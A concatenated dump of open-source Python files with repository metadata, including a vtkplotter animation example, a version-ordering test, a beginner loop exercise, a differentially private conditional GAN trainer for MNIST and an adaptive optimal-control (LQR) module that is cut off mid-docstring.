8b8cc3dcee06ab2783d556bc60df2a47668c5d00 | ffcce7bc3d82f19a2e024549f9fe3cd8e8702203 | /examples/other/animation2.py | 465af025dde5cf668f825fb115e5caad8b1f804a | [
"MIT"
] | permissive | jlqzzz/vtkplotter | 97f122e533b7f7d2dae1d7523d96326fbe5b8b60 | 6d28cb79153ddef29bc7b0bd19ddde655dcc392c | refs/heads/master | 2022-03-25T03:15:44.487184 | 2019-12-02T18:50:10 | 2019-12-02T18:50:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | """
This example shows how to animate simultaneously various objects
by specifying event times and durations of the visual effects.
"""
from vtkplotter import *
s = load(datadir+"bunny.obj").subdivide().normalize()
vp = Animation()
vp.timeResolution = 0.02 # secs
vp.switchOn(s)
# no need to repeat t=1, duration=3 in changeLighting and changeColor
vp.meshErode(corner=0, t=1, duration=3).changeLighting("glossy").changeColor("v")
cam1 = orientedCamera(backoffVector=(0, 0, -1), backoff=8)
cam2 = orientedCamera(backoffVector=(1, 1, 1), backoff=8)
vp.moveCamera(cam1, cam2, t=0, duration=4)
vp.play()
| [
"marco.musy@gmail.com"
] | marco.musy@gmail.com |
fe34abe7832b4c957422ee6ce3e3eb4df632a86d | ebcc40516adba151e6a1c772223b0726899a26eb | /tests/io_/test_versions.py | 462e87461b8534cdaa4886943c80729df6647e0a | [
"MIT"
] | permissive | spacetx/slicedimage | acf4a767f87b6ab78e657d85efad22ee241939f4 | eb8e1d3899628db66cffed1370f2a7e6dd729c4f | refs/heads/master | 2021-04-09T10:53:15.057821 | 2020-05-26T17:40:11 | 2020-05-26T17:40:11 | 125,316,414 | 7 | 4 | MIT | 2020-05-26T17:40:15 | 2018-03-15T05:24:24 | Python | UTF-8 | Python | false | false | 374 | py | from packaging import version
from slicedimage import VERSIONS
def test_version_increasing_order():
"""Verifies that the VERSIONS list is in increasing order."""
for ix in range(1, len(VERSIONS)):
prev_version = VERSIONS[ix - 1]
curr_version = VERSIONS[ix]
assert version.parse(prev_version.VERSION) < version.parse(curr_version.VERSION)
| [
"noreply@github.com"
] | spacetx.noreply@github.com |
6ae190b578bc78b85ffd969badfc177eb882069a | 1a0aba15348d5524c0d4a3fbe485f764bb9a0661 | /Class2_Python3/example_01000_for_loops.py | db1a51ca4c802012fbd1863bf6d97ee950215016 | [] | no_license | tazi337/smartninjacourse | dde55356e562134d5aa11b1c9e8c08efcbc53c60 | 93e7e5050c164b69fe20f251a787db6c6505a831 | refs/heads/master | 2023-05-13T18:30:13.679080 | 2019-12-12T17:30:59 | 2019-12-12T17:30:59 | 212,634,378 | 0 | 0 | null | 2023-05-02T17:57:02 | 2019-10-03T17:06:58 | HTML | UTF-8 | Python | false | false | 66 | py | # Schleife mit range
for number in range(10):
print(number)
| [
"tamara.zimmermann@otago.at"
] | tamara.zimmermann@otago.at |
f6bc874570ce5b3666fce15e4418c8b90e0ec31b | 8697515393180e6160edf7174412a5b73031e7c9 | /Advanced_DP_CGAN/gan/Base_DP_CGAN.py | 0b8a920910ee635ceca7f83c441cfe3dda309c98 | [
"Apache-2.0"
] | permissive | reihaneh-torkzadehmahani/DP-CGAN | 83d9cfdfeb36b6bf8fd2a37ce2c5debde513ecfe | 639ce4d261ee3202ab72ea5fe4ece916272bf524 | refs/heads/master | 2021-11-22T05:41:40.422952 | 2021-10-12T10:48:38 | 2021-10-12T10:48:38 | 162,071,578 | 27 | 7 | Apache-2.0 | 2019-09-18T08:36:20 | 2018-12-17T03:51:04 | Python | UTF-8 | Python | false | false | 19,493 | py | # -*- coding: utf-8 -*-
from __future__ import division
import time
import tensorflow as tf
from mlxtend.data import loadlocal_mnist
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from sklearn.metrics import roc_curve, auc
from sklearn import svm
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neural_network import MLPClassifier
from gan.utils import *
from gan.ops import *
from differential_privacy.privacy_accountant.tf import accountant
from differential_privacy.optimizer import base_dp_optimizer
base_dir = "./"
class Base_DP_CGAN(object):
model_name = "Basic_DP_CGAN" # name for checkpoint
def __init__(
self,
sess,
epoch,
z_dim,
batch_size,
sigma,
clipping,
delta,
epsilon,
learning_rate,
dataset_name,
base_dir,
result_dir):
self.accountant = accountant.GaussianMomentsAccountant(60000)
self.sess = sess
self.dataset_name = dataset_name
self.base_dir = base_dir
self.result_dir = result_dir
self.epoch = epoch
self.batch_size = batch_size
self.sigma = sigma
self.clipping = clipping
self.delta = delta
self.epsilon = epsilon
self.learning_rate = learning_rate
if dataset_name == 'mnist' or dataset_name == 'fashion-mnist':
# parameters
self.input_height = 28
self.input_width = 28
self.output_height = 28
self.output_width = 28
self.z_dim = z_dim # dimension of noise-vector
self.y_dim = 10 # dimension of condition-vector (label)
self.c_dim = 1
# train
self.beta1 = 0.5
# test
self.sample_num = 64 # number of generated images to be saved
# load mnist
self.data_X, self.data_y = load_mnist(self.dataset_name, self.base_dir)
# get number of batches for a single epoch
self.num_batches = len(self.data_X) // self.batch_size
else:
raise NotImplementedError
def discriminator(self, x, y, is_training=True, reuse=False):
# Network Architecture is exactly same as in infoGAN (https://arxiv.org/abs/1606.03657)
# Architecture : (64)4c2s-(128)4c2s_BL-FC1024_BL-FC1_S
with tf.variable_scope("discriminator", reuse=reuse):
# merge image and label
y = tf.reshape(y, [self.batch_size, 1, 1, self.y_dim])
x = conv_cond_concat(x, y)
net = lrelu(conv2d(x, 64, 4, 4, 2, 2, name='d_conv1'))
net = lrelu(bn(conv2d(net, 128, 4, 4, 2, 2, name='d_conv2'), is_training=is_training, scope='d_bn2'))
net = tf.reshape(net, [self.batch_size, -1])
net = lrelu(bn(linear(net, 1024, scope='d_fc3'), is_training=is_training, scope='d_bn3'))
out_logit = linear(net, 1, scope='d_fc4')
out = tf.nn.sigmoid(out_logit)
return out, out_logit, net
def generator(self, z, y, is_training=True, reuse=False):
# Network Architecture is exactly same as in infoGAN (https://arxiv.org/abs/1606.03657)
# Architecture : FC1024_BR-FC7x7x128_BR-(64)4dc2s_BR-(1)4dc2s_S
with tf.variable_scope("generator", reuse=reuse):
# merge noise and label
z = concat([z, y], 1)
net = tf.nn.relu(bn(linear(z, 1024, scope='g_fc1'), is_training=is_training, scope='g_bn1'))
net = tf.nn.relu(bn(linear(net, 128 * 7 * 7, scope='g_fc2'), is_training=is_training, scope='g_bn2'))
net = tf.reshape(net, [self.batch_size, 7, 7, 128])
net = tf.nn.relu(bn(deconv2d(
net, [self.batch_size, 14, 14, 64], 4, 4, 2, 2, name='g_dc3'),
is_training=is_training, scope='g_bn3'))
out = tf.nn.sigmoid(deconv2d(net, [self.batch_size, 28, 28, 1], 4, 4, 2, 2, name='g_dc4'))
return out
def build_model(self):
# some parameters
image_dims = [self.input_height, self.input_width, self.c_dim]
bs = self.batch_size
""" Graph Input """
# images
self.inputs = tf.placeholder(tf.float32, [bs] + image_dims, name='real_images')
# labels
self.y = tf.placeholder(tf.float32, [bs, self.y_dim], name='y')
# noises
self.z = tf.placeholder(tf.float32, [bs, self.z_dim], name='z')
""" Loss Function """
# output of D for real images
D_real, D_real_logits, _ = self.discriminator(self.inputs, self.y, is_training=True, reuse=False)
# output of D for fake images
G = self.generator(self.z, self.y, is_training=True, reuse=False)
D_fake, D_fake_logits, _ = self.discriminator(G, self.y, is_training=True, reuse=True)
# get loss for discriminator
d_loss_real = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones_like(D_real)))
d_loss_real_vec = tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones_like(D_real))
d_loss_fake = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros_like(D_fake)))
d_loss_fake_vec = tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros_like(D_fake))
self.d_loss_real = d_loss_real
self.d_loss_fake = d_loss_fake
self.d_loss = self.d_loss_real + self.d_loss_fake
self.d_loss_real_vec = d_loss_real_vec
self.d_loss_fake_vec = d_loss_fake_vec
# get loss for generator
self.g_loss = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.ones_like(D_fake)))
""" Training """
# divide trainable variables into a group for D and a group for G
t_vars = tf.trainable_variables()
d_vars = [var for var in t_vars if 'd_' in var.name]
g_vars = [var for var in t_vars if 'g_' in var.name]
# optimizers
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
d_optim_init = base_dp_optimizer.DPGradientDescentGaussianOptimizer(
self.accountant,
l2_norm_clip=self.clipping,
noise_multiplier=self.sigma,
num_microbatches=self.batch_size,
learning_rate=self.learning_rate)
global_step = tf.train.get_global_step()
self.d_optim = d_optim_init.minimize(
d_loss_real=d_loss_real_vec,
d_loss_fake=d_loss_fake_vec,
global_step=global_step,
var_list=d_vars)
g_optim_init = tf.train.AdamOptimizer(
self.learning_rate * 125,
beta1=self.beta1)
self.g_optim = g_optim_init.minimize(
self.g_loss,
var_list=g_vars)
"""" Testing """
# for test
self.fake_images = self.generator(
self.z,
self.y,
is_training=False,
reuse=True)
""" Summary """
d_loss_real_sum = tf.summary.scalar("d_loss_real", d_loss_real)
d_loss_fake_sum = tf.summary.scalar("d_loss_fake", d_loss_fake)
d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)
g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
# final summary operations
self.g_sum = tf.summary.merge([d_loss_fake_sum, g_loss_sum])
self.d_sum = tf.summary.merge([d_loss_real_sum, d_loss_sum])
def train(self):
# initialize all variables
tf.global_variables_initializer().run()
# graph inputs for visualize training results
self.sample_z = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
self.test_labels = self.data_y[0:self.batch_size]
# saver to save model
self.saver = tf.train.Saver()
start_epoch = 0
counter = 1
should_terminate = False
epoch = start_epoch
while epoch < self.epoch:
idx = 0
#print("epoch : " + str(epoch))
while (not should_terminate and idx < self.num_batches):
batch_images = self.data_X[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_labels = self.data_y[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
# update D network
_, d_loss, _ = self.sess.run(
[self.d_optim, self.d_loss_real_vec, self.d_loss_fake_vec],
feed_dict={self.inputs: batch_images, self.y: batch_labels, self.z: batch_z})
# update G network
_, summary_str, g_loss = self.sess.run(
[self.g_optim, self.g_sum, self.g_loss],
feed_dict={self.y: batch_labels, self.z: batch_z})
# Flag to terminate based on target privacy budget
terminate_spent_eps_delta = self.accountant.get_privacy_spent(
self.sess,
target_eps=[max(self.epsilon)])[0]
# For the Moments accountant, we should always have spent_eps == max_target_eps.
if (terminate_spent_eps_delta.spent_delta > self.delta or
terminate_spent_eps_delta.spent_eps > max(self.epsilon)):
should_terminate = True
print("epoch : " + str(epoch))
print("TERMINATE!!! Run out of privacy budget ...")
spent_eps_deltas = self.accountant.get_privacy_spent(self.sess, target_eps=self.epsilon)
print("Spent Eps and Delta : " + str(spent_eps_deltas))
epoch = self.epoch
break
if (idx % 100 == 0):
samples = self.sess.run(
self.fake_images,
feed_dict={self.z: self.sample_z, self.y: self.test_labels})
tot_num_samples = min(self.sample_num, self.batch_size)
manifold_h = int(np.floor(np.sqrt(tot_num_samples)))
manifold_w = int(np.floor(np.sqrt(tot_num_samples)))
save_images(
samples[:manifold_h * manifold_w, :, :, :],
[manifold_h, manifold_w],
check_folder(self.result_dir + self.model_dir)\
+ self.model_name\
+ '_train_{:02d}_{:04d}.png'.format(epoch, idx))
idx += 1
# show temporal results
self.visualize_results(epoch)
epoch += 1
# compute ROC
def compute_fpr_tpr_roc(Y_test, Y_score):
n_classes = Y_score.shape[1]
false_positive_rate = dict()
true_positive_rate = dict()
roc_auc = dict()
for class_cntr in range(n_classes):
false_positive_rate[class_cntr], true_positive_rate[class_cntr], _ = roc_curve(
Y_test[:, class_cntr],
Y_score[:, class_cntr])
roc_auc[class_cntr] = auc(false_positive_rate[class_cntr], true_positive_rate[class_cntr])
# Compute micro-average ROC curve and ROC area
false_positive_rate["micro"], true_positive_rate["micro"], _ = roc_curve(Y_test.ravel(),
Y_score.ravel())
roc_auc["micro"] = auc(false_positive_rate["micro"], true_positive_rate["micro"])
return false_positive_rate, true_positive_rate, roc_auc
def classify(X_train, Y_train, X_test, classiferName, random_state_value=0):
if classiferName == "svm":
classifier = OneVsRestClassifier(
svm.SVC(kernel='linear', probability=True, random_state=random_state_value))
elif classiferName == "dt":
classifier = OneVsRestClassifier(DecisionTreeClassifier(random_state=random_state_value))
elif classiferName == "lr":
classifier = OneVsRestClassifier(
LogisticRegression(solver='lbfgs', multi_class='multinomial',
random_state=random_state_value))
elif classiferName == "rf":
classifier = OneVsRestClassifier(
RandomForestClassifier(n_estimators=100, random_state=random_state_value))
elif classiferName == "gnb":
classifier = OneVsRestClassifier(GaussianNB())
elif classiferName == "bnb":
classifier = OneVsRestClassifier(BernoulliNB(alpha=.01))
elif classiferName == "ab":
classifier = OneVsRestClassifier(AdaBoostClassifier(random_state=random_state_value))
elif classiferName == "mlp":
classifier = OneVsRestClassifier(MLPClassifier(random_state=random_state_value, alpha=1))
else:
print("Classifier not in the list!")
exit()
Y_score = classifier.fit(X_train, Y_train).predict_proba(X_test)
return Y_score
batch_size = int(self.batch_size)
n_class = np.zeros(10)
n_class[0] = 5923 - batch_size
n_class[1] = 6742
n_class[2] = 5958
n_class[3] = 6131
n_class[4] = 5842
n_class[5] = 5421
n_class[6] = 5918
n_class[7] = 6265
n_class[8] = 5851
n_class[9] = 5949
Z_sample = np.random.uniform(-1, 1, size=(batch_size, self.z_dim))
y = np.zeros(batch_size, dtype=np.int64) + 0
y_one_hot = np.zeros((batch_size, self.y_dim))
y_one_hot[np.arange(batch_size), y] = 1
images = self.sess.run(self.fake_images, feed_dict={self.z: Z_sample, self.y: y_one_hot})
for classLabel in range(0, 10):
for _ in range(0, int(n_class[classLabel]), batch_size):
Z_sample = np.random.uniform(-1, 1, size=(batch_size, self.z_dim))
y = np.zeros(batch_size, dtype=np.int64) + classLabel
y_one_hot_init = np.zeros((batch_size, self.y_dim))
y_one_hot_init[np.arange(batch_size), y] = 1
images = np.append(images, self.sess.run(self.fake_images,
feed_dict={self.z: Z_sample, self.y: y_one_hot_init}), axis=0)
y_one_hot = np.append(y_one_hot, y_one_hot_init, axis=0)
X_test, Y_test = loadlocal_mnist(images_path=self.base_dir + 'mnist/t10k-images.idx3-ubyte',
labels_path=self.base_dir + 'mnist/t10k-labels.idx1-ubyte')
Y_test = [int(y) for y in Y_test]
classes = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
Y_test = label_binarize(Y_test, classes=classes)
print("Classifying - Logistic Regression ... ")
TwoDim_images = images.reshape(np.shape(images)[0], -2)
Y_score = classify(TwoDim_images, y_one_hot, X_test, "lr", random_state_value=30)
false_positive_rate, true_positive_rate, roc_auc = compute_fpr_tpr_roc(Y_test, Y_score)
print("AuROC: " + str(roc_auc["micro"]))
classification_results_fname = self.base_dir + "/Results/Base_DP_CGAN_AuROC.txt"
classification_results = open(classification_results_fname , "w")
classification_results.write("\nepsilon : {:d}, sigma: {:.2f}, clipping value: {:.2f}".format(
max(self.epsilon),
round(self.sigma,2),
round(self.clipping,2)))
classification_results.write("\nAuROC: " + str(roc_auc["micro"]))
classification_results.write("\n------------------------------------------------------------------------------------\n")
def visualize_results(self, epoch):
tot_num_samples = min(self.sample_num, self.batch_size)
image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))
""" random condition, random noise """
y = np.random.choice(self.y_dim, self.batch_size)
y_one_hot = np.zeros((self.batch_size, self.y_dim))
y_one_hot[np.arange(self.batch_size), y] = 1
z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))
samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample, self.y: y_one_hot})
save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_all_classes.png')
""" specified condition, random noise """
n_styles = 10 # must be less than or equal to self.batch_size
np.random.seed()
si = np.random.choice(self.batch_size, n_styles)
for l in range(self.y_dim):
y = np.zeros(self.batch_size, dtype=np.int64) + l
y_one_hot = np.zeros((self.batch_size, self.y_dim))
y_one_hot[np.arange(self.batch_size), y] = 1
samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample, self.y: y_one_hot})
save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_class_%d.png' % l)
samples = samples[si, :, :, :]
if l == 0:
all_samples = samples
else:
all_samples = np.concatenate((all_samples, samples), axis=0)
""" save merged images to check style-consistency """
canvas = np.zeros_like(all_samples)
for s in range(n_styles):
for c in range(self.y_dim):
canvas[s * self.y_dim + c, :, :, :] = all_samples[c * n_styles + s, :, :, :]
save_images(canvas, [n_styles, self.y_dim],
check_folder(
self.result_dir + '/' + self.model_dir) + '/' + self.model_name + '_epoch%03d' % epoch + '_test_all_classes_style_by_style.png')
@property
def model_dir(self):
return "Train_{}_{}_{}_{}".format(
self.model_name, self.dataset_name,
self.batch_size, self.delta)
| [
"reihaneh.torkzadehmahani@gmail.com"
] | reihaneh.torkzadehmahani@gmail.com |
03fbbd024ace79d6db60da0d6fa7e50fac2b92b8 | 12094b02c411f986e8f66f1f971f8e3ae99a8167 | /OpenControl/ADP_control/controller.py | feeb8be9b624ea12d776d1409e3dbf353b7a66ee | [
"MIT"
] | permissive | masbudisulaksono/OpenControl | f8fcbe63290a0011f3ea7412a0200ca9f8913ec9 | 0087408c57bc77f34f524b28f8c4363b116700bb | refs/heads/master | 2023-06-22T09:57:54.579445 | 2021-07-16T05:10:59 | 2021-07-16T05:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,122 | py | import numpy as np
from scipy import integrate
from control import lqr
from ..visualize import Logger
from .system import LTI,NonLin
class LTIController():
"""This present continuous controller for LTI System
Attributes:
system (LTI class): the object of LTI class
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
logX (Logger class): the object of Logger class, use for logging state signals
K0 (mxn array, optional): The initial value of K matrix. Defaults to np.zeros((m,n)).
Q (nxn array, optional): The Q matrix. Defaults to 1.
R (mxm array, optional): The R matrix. Defaults to 1.
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
logK (Logger class): logger of the K matrix
logP (Logger class): logger of the P matrix
t_plot, x_plot (float, array): use for logging, plotting simulation result
viz (boolean): True for visualize results on ``Tensorboard``. Default to True
"""
def __init__(self, system, log_dir='results'):
"""Design a controller for the system input.
Args:
system (LTI class): Call this class after system.setSimulationParams()
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
"""
self.system = system
self.model = system.model
self.A = self.model['A']
self.B = self.model['B']
self.dimension = self.model['dimension']
self.log_dir = log_dir
self.logX = Logger(log_dir=log_dir)
def step(self, x0, u, t_span):
"""Step respond of the system.
Args:
x0 (1D array): initial state for simulation
u (1D array): the value of input within t_span
t_span (list): (t_start, t_stop)
Returns:
list, 2D array: t_span, state at t_span (x_start, x_stop)
"""
# u is the function of t and x (feedback law)
dx_dt = lambda t,x: self.A.dot(x) + self.B.dot(u(t,x))
result = integrate.solve_ivp(fun=dx_dt, y0=x0, t_span=t_span, method=self.system.algo, max_step=self.system.max_step, dense_output=True)
return result.t, result.y.T
def LQR(self, Q=None, R=None):
"""This function solve Riccati function with defined value function
Args:
Q (nxn array optional): the Q matrix. Defaults to 1.
R (mxm arary, optional): the R matrix. Defaults to 1.
Returns:
mxn array, nxn array: the K, P matrix
"""
if np.all(Q==None):
Q = np.eye(self.A.shape[0])
if np.all(R==None):
R = np.eye(self.B.shape[1])
K,P,E = lqr(self.A, self.B, Q, R)
return K, P
def _isStable(self, A):
eig = np.linalg.eig(A)[0].real
return np.all(eig<0)
def onPolicy(self, stop_thres=1e-3, viz=True):
"""Using On-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (bool, optional): True for logging data. Defaults to True.
Raises:
ValueError: raise when the user-defined number of data is not enough, make rank condition unsatisfied
Returns:
mxn array, nxn array: the optimal K, P matrix
"""
#online data collection
self.viz = viz
x_plot = [self.system.x0] # list of array
t_plot = [self.system.t_sim[0]]
save_P = []
save_K = [self.K0]
K = save_K[-1]
iter = 0
while t_plot[-1] < self.system.t_sim[1]:
u = lambda t,x: -K.dot(x) + self.explore_noise(t)
theta = []
xi = []
# collect data_per_eval x data, iterate within an eval
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
t_collect = t_plot[-1]
# collect online data, iterate within a sample time
while t_plot[-1] < t_collect + self.data_eval:
t_temp, x_temp = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + self.system.sample_time))
if self.viz:
self.logX.log('states_onPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
x_sample.append(x_temp[-1])
t_sample.append(t_temp[-1])
x_plot.extend(x_temp[1:].tolist())
t_plot.extend(t_temp[1:].tolist())
thetaRow, xiRow = self._rowGainOnPloicy(K, x_sample, t_sample)
theta.append(thetaRow)
xi.append(xiRow)
theta = np.array(theta)
xi = np.array(xi)
# check rank condition
n,m = self.dimension
if np.linalg.matrix_rank(theta) < m*n + n*(n+1)/2:
print('not enough number of data, rank condition unsatisfied!')
raise ValueError
# solve P, K matrix
PK = np.linalg.pinv(theta).dot(xi)
P = PK[:n*n].reshape((n,n))
if self.viz:
self.logP.log('P_onPolicy', P, iter)
self.logK.log('K_onPolicy', K, iter)
save_P.append(P)
# check stopping criteria
try:
err = np.linalg.norm(save_P[-1]-save_P[-2], ord=2)
if err < stop_thres:
self.t_plot, self.x_plot = self._afterGainKopt(t_plot, x_plot, K, 'states_onPolicy')
break
except: pass
K = PK[n*n:].reshape((n,m)).T
save_K.append(K)
iter += 1
return save_K[-1], save_P[-1]
def _afterGainKopt(self, t_plot, x_plot, Kopt, section):
# remove explore noise
u = lambda t,x: -Kopt.dot(x)
sample_time = self.system.sample_time
start = t_plot[-1]
stop = self.system.t_sim[1]
N = int((stop - start)/sample_time)
for i in range(N):
t_temp, x_temp = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + sample_time))
if self.viz:
self.logX.log(section, x_temp[-1], int(t_temp[-1]/self.system.sample_time))
x_plot.extend(x_temp[1:].tolist())
t_plot.extend(t_temp[1:].tolist())
return t_plot, x_plot
def _rowGainOnPloicy(self, K, x_sample, t_sample):
xx = np.kron(x_sample[-1], x_sample[-1]) - np.kron(x_sample[0], x_sample[0])
xeR = []
xQx = []
Qk = self.Q + K.T.dot(self.R.dot(K))
# print(np.array(x_sample).shape)
for i, xi in enumerate(x_sample):
# print(type(xi))
xi = np.array(xi)
ei = self.explore_noise(t_sample[i])
xeR.append(np.kron(xi, np.dot(ei,(self.R)).squeeze()))
xQx.append(xi.dot(Qk.dot(xi)))
xeR = -2*integrate.simpson(xeR, t_sample, axis=0)
# xeR = -2*np.trapz(xeR, dx=sample_time, axis=0)
_thetaRow = np.hstack((xx, xeR))
_xiRow = -integrate.simpson(xQx, t_sample, axis=0)
# _xiRow = -np.trapz(xQx, dx=sample_time, axis=0)
return _thetaRow, _xiRow
def setPolicyParam(self, K0=None, Q=None, R=None, data_eval=0.1, num_data=10, explore_noise=lambda t: 2*np.sin(100*t)):
"""Setup policy parameters for both the On (Off) policy algorithms. Initalize logger for K, P matrix
Args:
K0 (mxn array, optional): The initial value of K matrix. Defaults to np.zeros((m,n)).
Q (nxn array, optional): The Q matrix. Defaults to 1.
R (mxm array, optional): The R matrix. Defaults to 1.
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
Raises:
ValueError: raise when the initial value of the K matrix is not admissible
Note:
- The K0 matrix must be admissible
- data_eval must be larger than the sample_time
- num_data >= n(n+1) + 2mn
"""
if np.all(Q==None):
Q = np.eye(self.A.shape[0])
if np.all(R==None):
R = np.eye(self.B.shape[1])
if np.all(K0==None):
K0 = np.zeros(self.dimension).T
if len(K0.shape)==1:
K0 = np.expand_dims(K0, axis=0)
# check stable of K0
if not self._isStable(self.A - self.B.dot(K0)):
print('the inital K0 matrix is not stable, try re-initialize K0')
raise ValueError
self.K0 = K0
self.Q = Q
self.R = R
self.data_eval = data_eval
self.num_data = num_data
self.explore_noise = explore_noise
self.logK = Logger(log_dir=self.log_dir)
self.logP = Logger(log_dir=self.log_dir)
def offPolicy(self, stop_thres=1e-3, max_iter=30, viz=True):
"""Using Off-policy approach to find optimal adaptive feedback controller, requires only the dimension of the system
Args:
stop_thres (float, optional): threshold value to stop iteration. Defaults to 1e-3.
viz (bool, optional): True for logging data. Defaults to True.
max_iter (int, optional): the maximum number of policy iterations. Defaults to 30.
Raises:
ValueError: raise when the user-defined number of data is not enough, make rank condition unsatisfied
Returns:
mxn array, nxn array: the optimal K, P matrix
"""
self.viz = viz
self.stop_thres = stop_thres
self.max_iter = max_iter
save_K = [self.K0]
save_P = []
x_plot = [self.system.x0] # list of array
t_plot = [self.system.t_sim[0]]
u = lambda t,x: -self.K0.dot(x) + self.explore_noise(t)
dxx = []
Ixx = []
Ixu = []
for i in range(self.num_data):
x_sample = [x_plot[-1]]
t_sample = [t_plot[-1]]
#collect data, iterate within data eval
t_collect = t_plot[-1]
while t_plot[-1] < t_collect + self.data_eval:
t_temp, x_temp = self.step(x0=x_plot[-1], u=u, t_span=(t_plot[-1], t_plot[-1] + self.system.sample_time))
if self.viz:
self.logX.log('states_offPolicy', x_temp[-1], int(t_temp[-1]/self.system.sample_time))
x_sample.append(x_temp[-1])
t_sample.append(t_temp[-1])
x_plot.extend(x_temp[1:].tolist())
t_plot.extend(t_temp[1:].tolist())
dxx_ , Ixx_, Ixu_ = self._getRowOffPolicyMatrix(t_sample, x_sample)
dxx.append(dxx_)
Ixx.append(Ixx_)
Ixu.append(Ixu_)
# check rank condition
test_matrix = np.hstack((Ixx, Ixu))
n,m = self.dimension
if np.linalg.matrix_rank(test_matrix) < m*n + n*(n+1)/2:
print('not enough data, rank condition is not satisfied')
raise ValueError
# find optimal solution
save_K, save_P = self._policyEval(dxx, Ixx, Ixu)
self.Kopt = save_K[-1]
self.t_plot, self.x_plot = self._afterGainKopt(t_plot, x_plot, self.Kopt, 'states_offPolicy')
# return optimal policy
return save_K[-1], save_P[-1]
def _policyEval(self, dxx, Ixx, Ixu):
dxx = np.array(dxx) # n_data x (n_state^2)
Ixx = np.array(Ixx) # n_data x (n_state^2)
Ixu = np.array(Ixu) # n_data x (n_state*n_input)
save_K = [self.K0]
save_P = []
n,m = self.dimension
K = save_K[-1] # mxn
for i in range(self.max_iter):
temp = -2*Ixx.dot(np.kron(np.eye(n), K.T.dot(self.R))) - 2*Ixu.dot(np.kron(np.eye(n), self.R))
theta = np.hstack((dxx, temp))
Qk = self.Q + K.T.dot(self.R.dot(K))
xi = -Ixx.dot(Qk.ravel())
PK = np.linalg.pinv(theta).dot(xi)
P = PK[:n*n].reshape((n,n))
if self.viz:
self.logP.log('P_offPolicy', P, i)
self.logK.log('K_offPolicy', K, i)
save_P.append(P)
# check stopping criteria
try:
err = np.linalg.norm(save_P[-1] - save_P[-2], ord=2)
if err < self.stop_thres:
break
except: pass
K = PK[n*n:].reshape((n,m)).T
save_K.append(K)
return save_K, save_P
def _getRowOffPolicyMatrix(self, t_sample, x_sample):
u = lambda t,x: -self.K0.dot(x) + self.explore_noise(t)
dxx_ = np.kron(x_sample[-1], x_sample[-1]) - np.kron(x_sample[0], x_sample[0])
xx = []
xu = []
for i, xi in enumerate(x_sample):
xx.append(np.kron(xi, xi))
ui = u(t_sample[i], xi)
xu.append(np.kron(xi, ui))
Ixx_ = integrate.simpson(xx, t_sample, axis=0)
Ixu_ = integrate.simpson(xu, t_sample, axis=0)
return dxx_, Ixx_, Ixu_
class NonLinController():
"""This present continuous controller for Non-Linear System
Attributes:
system (nonLin class): the object of nonLin class
log_dir (string, optional): the folder include all log files. Defaults to 'results'.
logX (Logger class): the object of Logger class, use for logging state signals
u0 (func(x), optional): The initial feedback control policy. Defaults to 0.
q_func (func(x), optional): the function :math:`q(x)`. Defaults to nonLinController.default_q_func.
R (mxm array, optional): The R matrix. Defaults to 1.
phi_func (list of func(x), optional): the sequences of basis function to approximate critic, :math:`\phi_j(x)`. Defaults to nonLinController.default_phi_func
psi_func (list of func(x), optional): the sequences of basis function to approximate actor, :math:`\psi_j(x)`. Defaults to nonLinController.default_psi_func
data_eval (float, optional): data_eval x num_data = time interval for each policy updation. Defaults to 0.1.
num_data (int, optional): the number of data for each learning iteration. Defaults to 10.
explore_noise (func(t), optional): The exploration noise within the learning stage. Defaults to lambda t:2*np.sin(100*t).
logWa (Logger class): logging to value of the weight of the actor
logWc (Logger class): logging to value of the weight of the critic
